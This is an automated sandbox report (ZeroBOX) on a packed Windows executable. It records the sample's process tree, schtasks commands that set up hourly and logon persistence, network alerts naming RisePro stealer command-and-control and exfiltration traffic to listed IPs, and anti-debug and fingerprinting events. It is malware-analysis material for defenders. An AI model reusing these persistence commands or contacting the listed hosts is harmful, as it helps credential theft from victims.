Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 10, 2024, 2:38 p.m.	Feb. 10, 2024, 2:48 p.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`ceb083f9f6b650cda498738efb17554a`
SHA256	`00dd45530273a8b008f6005e7a8165ff823a30bca1c886545f17c575ff4cbd50`
CRC32	`E942BBAF`
ssdeep	`49152:45khnNXmw0FNpRVPZUiCyPptHiRfWAeKBreXkw6vYLT:vnQvFNtPyPitwfWAeK8XktvIT`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

hunta.exe "C:\Users\test22\AppData\Local\Temp\hunta.exe"
2536
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2756
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2840
- GCJM2BjvEnYGmelfoaDl.exe "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe"
  744
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2088
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2088 CREDAT:145409
      192
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3068
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
      2116
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1632 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3104
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    1892
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
      2424
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1256 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      1400
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    1736
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
      936
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1616 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3184
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    1320
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      2796
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\9d1d02e8-e52e-4b7c-a24c-39f14a1c6ae0.dmp"
        2472
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\9d1d02e8-e52e-4b7c-a24c-39f14a1c6ae0.dmp"
        3556
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    2352
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      1168
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\c3c87995-676e-4f72-8350-9111d3bc0359.dmp"
        3080
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\c3c87995-676e-4f72-8350-9111d3bc0359.dmp"
        3612
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    2948
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      2176
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\6ba4bacf-9712-4944-82ed-c3b1ff9122cc.dmp"
        3976
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\6ba4bacf-9712-4944-82ed-c3b1ff9122cc.dmp"
        3228
- reZ6hWk3uTMCU8DEiLuN.exe "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\reZ6hWk3uTMCU8DEiLuN.exe"
  2620
- gGsdfWLuIIWuTEAQRw0I.exe "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe"
  452
- mfiHK3tvHMJf4FRrzQj9.exe "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe"
  1332
- gn2NF5bKoBfySMlY_Quu.exe "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe"
  3056
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
accounts.google.com	A 142.251.8.84	74.125.203.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.250.66.36	142.250.76.132
ssl.gstatic.com	A 142.250.199.67	142.250.76.131
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166
www.maxmind.com	A 104.18.145.235 A 104.18.146.235	104.18.145.235

IP Address	Status	Action
104.18.146.235	Active	Moloch
117.18.232.200	Active	Moloch
142.250.199.67	Active	Moloch
142.250.66.36	Active	Moloch
142.251.8.84	Active	Moloch
164.124.101.2	Active	Moloch
172.67.75.166	Active	Moloch
193.233.132.167	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49168 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.167:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49187 -> 142.250.199.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49184 -> 142.251.8.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 142.251.8.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.101:49189	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49191 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49191 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49191 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49193 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 142.250.66.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 142.250.66.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 142.250.199.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.101:49201	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49202	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49202 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49209 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.101:49176	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49204 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49204 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49208 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49168 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49187 142.250.199.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	9d:25:7e:5c:df:c3:e5:5b:00:4f:04:97:a3:48:a3:30:60:9a:db:48
TLSv1 192.168.56.101:49184 142.251.8.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	ab:83:36:d4:0e:8a:7a:70:e2:25:37:9f:9b:e7:d1:f8:48:1f:68:07
TLSv1 192.168.56.101:49183 142.251.8.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	ab:83:36:d4:0e:8a:7a:70:e2:25:37:9f:9b:e7:d1:f8:48:1f:68:07
TLSv1 192.168.56.101:49193 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49196 142.250.66.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5d:23:4f:47:50:a1:0c:c2:bd:e0:26:27:45:ea:e2:c7:f5:34:61:5b
TLSv1 192.168.56.101:49197 142.250.66.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5d:23:4f:47:50:a1:0c:c2:bd:e0:26:27:45:ea:e2:c7:f5:34:61:5b
TLSv1 192.168.56.101:49186 142.250.199.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	9d:25:7e:5c:df:c3:e5:5b:00:4f:04:97:a3:48:a3:30:60:9a:db:48
TLSv1 192.168.56.101:49209 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49208 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 10, 2024, 2:38 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 146 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:38 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0
IsDebuggerPresent Feb. 10, 2024, 2:39 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Feb. 10, 2024, 2:38 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Feb. 10, 2024, 2:38 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 10, 2024, 2:38 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	bbptunxo
section	scbyqzyo
section	.taggant

One or more processes crashed (50 out of 502 events)

Time & API	Arguments	Status
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: hunta+0x41e0b9 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 4317369 exception.address: 0x111e0b9 registers.esp: 3734880 registers.edi: 0 registers.eax: 1 registers.ebp: 3734896 registers.edx: 19795968 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 0e 5a 71 0d 59 68 41 fd 81 37 89 14 24 89 exception.symbol: hunta+0x14ca42 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 1362498 exception.address: 0xe4ca42 registers.esp: 3734848 registers.edi: 1968898280 registers.eax: 27655 registers.ebp: 4005011476 registers.edx: 15018498 registers.ebx: 170352052 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 47 05 00 00 8b 0c 24 e9 c4 ff ff ff 81 c4 exception.symbol: hunta+0x14bedf exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 1359583 exception.address: 0xe4bedf registers.esp: 3734848 registers.edi: 1968898280 registers.eax: 27655 registers.ebp: 4005011476 registers.edx: 14994162 registers.ebx: 432171094 registers.esi: 3 registers.ecx: 0	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 55 89 1c 24 83 ec 04 89 0c 24 e9 54 ff ff ff exception.symbol: hunta+0x14d09b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 1364123 exception.address: 0xe4d09b registers.esp: 3734844 registers.edi: 1968898280 registers.eax: 25952 registers.ebp: 4005011476 registers.edx: 14994162 registers.ebx: 432171094 registers.esi: 3 registers.ecx: 14994583	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 0e 8b 1c 24 68 4e c5 7c 01 89 1c exception.symbol: hunta+0x14cf5b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 1363803 exception.address: 0xe4cf5b registers.esp: 3734848 registers.edi: 1968898280 registers.eax: 25952 registers.ebp: 4005011476 registers.edx: 14994162 registers.ebx: 432171094 registers.esi: 3 registers.ecx: 15020535	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 53 89 04 24 e9 f5 05 00 00 52 ba 2d 93 ff 77 exception.symbol: hunta+0x14cd08 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 1363208 exception.address: 0xe4cd08 registers.esp: 3734848 registers.edi: 1968898280 registers.eax: 25952 registers.ebp: 4005011476 registers.edx: 14994162 registers.ebx: 234729 registers.esi: 4294943832 registers.ecx: 15020535	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 53 bb a2 43 67 77 01 da 5b 03 14 24 81 ec 04 exception.symbol: hunta+0x2d384d exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 2963533 exception.address: 0xfd384d registers.esp: 3734844 registers.edi: 15030456 registers.eax: 31243 registers.ebp: 4005011476 registers.edx: 16593124 registers.ebx: 1269760 registers.esi: 16592615 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 16 05 00 00 33 14 24 e9 90 02 00 00 c1 e0 exception.symbol: hunta+0x2d34b8 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 2962616 exception.address: 0xfd34b8 registers.esp: 3734848 registers.edi: 604277077 registers.eax: 31243 registers.ebp: 4005011476 registers.edx: 16595979 registers.ebx: 1269760 registers.esi: 0 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 57 89 14 24 57 55 89 0c 24 68 31 03 41 67 89 exception.symbol: hunta+0x2d9af8 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 2988792 exception.address: 0xfd9af8 registers.esp: 3734848 registers.edi: 16643329 registers.eax: 25561 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 48104158 registers.esi: 0 registers.ecx: 734	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 35 cf e5 2f 89 0c 24 89 e1 81 c1 04 00 00 exception.symbol: hunta+0x2d92dd exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 2986717 exception.address: 0xfd92dd registers.esp: 3734848 registers.edi: 16620397 registers.eax: 1549541099 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 48104158 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 cd 00 00 00 5d c1 e2 04 31 c2 31 d0 31 c2 exception.symbol: hunta+0x2e0abc exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3017404 exception.address: 0xfe0abc registers.esp: 3734844 registers.edi: 4599191 registers.eax: 28870 registers.ebp: 4005011476 registers.edx: 4752720 registers.ebx: 16647781 registers.esi: 0 registers.ecx: 1969148396	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 d7 fd ff ff ff 34 24 5a e9 8e fe ff ff 83 exception.symbol: hunta+0x2e0940 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3017024 exception.address: 0xfe0940 registers.esp: 3734848 registers.edi: 4599191 registers.eax: 28870 registers.ebp: 4005011476 registers.edx: 4752720 registers.ebx: 16676651 registers.esi: 0 registers.ecx: 1969148396	1
